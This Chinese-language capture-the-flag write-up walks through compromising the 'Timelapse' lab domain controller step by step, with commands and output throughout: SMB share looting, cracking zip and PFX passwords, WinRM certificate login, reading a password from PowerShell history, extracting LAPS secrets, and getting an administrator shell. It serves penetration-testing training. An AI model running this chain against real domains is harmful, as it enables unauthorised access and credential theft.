系统:windows
内容:pfx文件操作,LAPS
扫描一下端口。
~/D/t $auto_nmap.sh $IP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-14 21:15:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2025-01-14T21:17:15+00:00; +7h44m19s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after: 2022-10-25T14:25:29
| MD5: e233:a199:4504:0859:013f:b9c5:e4f6:91c3
|_SHA-1: 5861:acf7:76b8:703f:d01e:e25d:fc7c:9952:a447:7652
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49705/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows将域名和域控名加入hosts。
~/D/t $echo '10.10.11.152 dc01.timelapse.htb timelapse.htb' | sudo tee -a /etc/hosts
10.10.11.152 dc01.timelapse.htb timelapse.htb这种没有http入口的通常只能从smb进入。
~/D/t $crackmapexec smb $IP -u 'null' -p '' --shares
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\null:
SMB 10.10.11.152 445 DC01 [+] Enumerated shares
SMB 10.10.11.152 445 DC01 Share Permissions Remark
SMB 10.10.11.152 445 DC01 ----- ----------- ------
SMB 10.10.11.152 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.152 445 DC01 C$ Default share
SMB 10.10.11.152 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.152 445 DC01 NETLOGON Logon server share
SMB 10.10.11.152 445 DC01 Shares READ
SMB 10.10.11.152 445 DC01 SYSVOL Logon server share查看shares文件夹,下载里面的文件。
~/D/t $smbclient //$IP/Shares -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 17:39:15 2021
.. D 0 Mon Oct 25 17:39:15 2021
Dev D 0 Mon Oct 25 21:40:06 2021
HelpDesk D 0 Mon Oct 25 17:48:42 2021
6367231 blocks of size 4096. 1288862 blocks available
smb: \> recurse ON
smb: \> prompt off
smb: \> mget *解压后得到一个pfx文件。
~/D/t/D $zip2john winrm_backup.zip > winrm_backup.zip.hash
~/D/t/D $john --wordlist=/usr/share/wordlists/rockyou.txt winrm_backup.zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2025-01-14 14:59) 4.545g/s 15788Kp/s 15788Kc/s 15788KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.获取域用户名。
~/D/t $netexec smb $IP -u 'anonymous' -p '' --rid-brute 10000 |grep SidTypeUser |awk '{print $6}' |cut -d '\' -f2 | tee names.txt
Administrator
Guest
krbtgt
DC01$
thecybergeek
payl0ad
legacyy
sinfulz
babywyrm
DB01$
WEB01$
DEV01$
svc_deploy
TRX刚才解压的pfx文件很可能属于某个用户,且从文件名看,很可能属于legacyy。
pfx都是有密码的,继续用john破解一下。
~/D/t/D $pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.pfx.hash
~/D/t/D $john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 SSE2 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:23 DONE (2025-01-14 22:55) 0.01197g/s 38683p/s 38683c/s 38683C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.pfx文件中可能包含的内容:
包含私钥(Private Key):用于解密或签名。
包含公钥证书(Public Key Certificate):用于身份验证。
可能包含证书链(Certificate Chain):确保信任关系。
解压出私钥和证书链。
~/D/t/D $openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
Enter Import Password:
~/D/t/D $openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem
Enter Import Password:可以登录shell了。
~/D/t/D $evil-winrm -i $IP -c cert.pem -k key.pem -S
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyywinpeas收集一波信息,注意到有个powershell的历史文件(很容易错过,所以还是要细心)
???????????? PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 434B查看内容,可以发现密码,看样子是svc_deploy的。
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit验证一下该密码的归属和权限,可以登录smb和ldap。
~/D/t $netexec smb $IP -u names.txt -p 'E3R$Q62^12p7PLlC%KWaxuaV' --continue-on-success
...
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
...
~/D/t $check_auth.sh $IP -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Running: netexec smb 10.10.11.152 -u null -p null
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\null:null (Guest)
----------------------------------------
Running: netexec winrm 10.10.11.152 -u null -p null
WINRM-SSL 10.10.11.152 5986 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:timelapse.htb)
WINRM-SSL 10.10.11.152 5986 DC01 [-] timelapse.htb\null:null
----------------------------------------
Running: netexec ldap 10.10.11.152 -u null -p null
/opt/check_auth.sh: line 57: warning: command substitution: ignored null byte in input
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\null:null收集bloodhound信息。
~/D/t $netexec ldap $IP -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' --bloodhound --collection All --dns-server $IP
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LDAP 10.10.11.152 389 DC01 Resolved collection methods: acl, group, rdp, psremote, localadmin, session, trusts, objectprops, dcom, container
LDAP 10.10.11.152 389 DC01 Done in 00M 19S
LDAP 10.10.11.152 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.152_2025-01-15_144347_bloodhound.zip在bloodhound中发现svc_deploy的所属组可以读取LAPS密码。
在 Windows 环境下,ms-Mcs-AdmPwd 是一个 Active Directory(AD)属性,用于存储本地管理员密码。它与微软的 Local Administrator Password Solution (LAPS) 相关。LAPS 是微软提供的一种工具,用于自动管理域环境中计算机的本地管理员账户密码。
按照提示下载脚本后执行。
~/D/t $pyLAPS.py --action get -d "timelapse.htb" -u "svc_deploy" -p 'E3R$Q62^12p7PLlC%KWaxuaV'
__ ___ ____ _____
____ __ __/ / / | / __ \/ ___/
/ __ \/ / / / / / /| | / /_/ /\__ \
/ /_/ / /_/ / /___/ ___ |/ ____/___/ /
/ .___/\__, /_____/_/ |_/_/ /____/ v1.2
/_/ /____/ @podalirius_
[+] Extracting LAPS passwords of all computers ...
| DC01$ : )H;z4dC4v[;)4d8Ggu$4k7&Z
[+] All done!验证该密码就是属于administrator。
~/D/t $netexec smb $IP -u names.txt -p ')H;z4dC4v[;)4d8Ggu$4k7&Z'
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\Administrator:)H;z4dC4v[;)4d8Ggu$4k7&Z (Pwn3d!)登录shell,DONE!
~/D/t $impacket-wmiexec timelapse.htb/administrator:')H;z4dC4v[;)4d8Ggu$4k7&Z'@dc01.t
imelapse.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
timelapse\administrator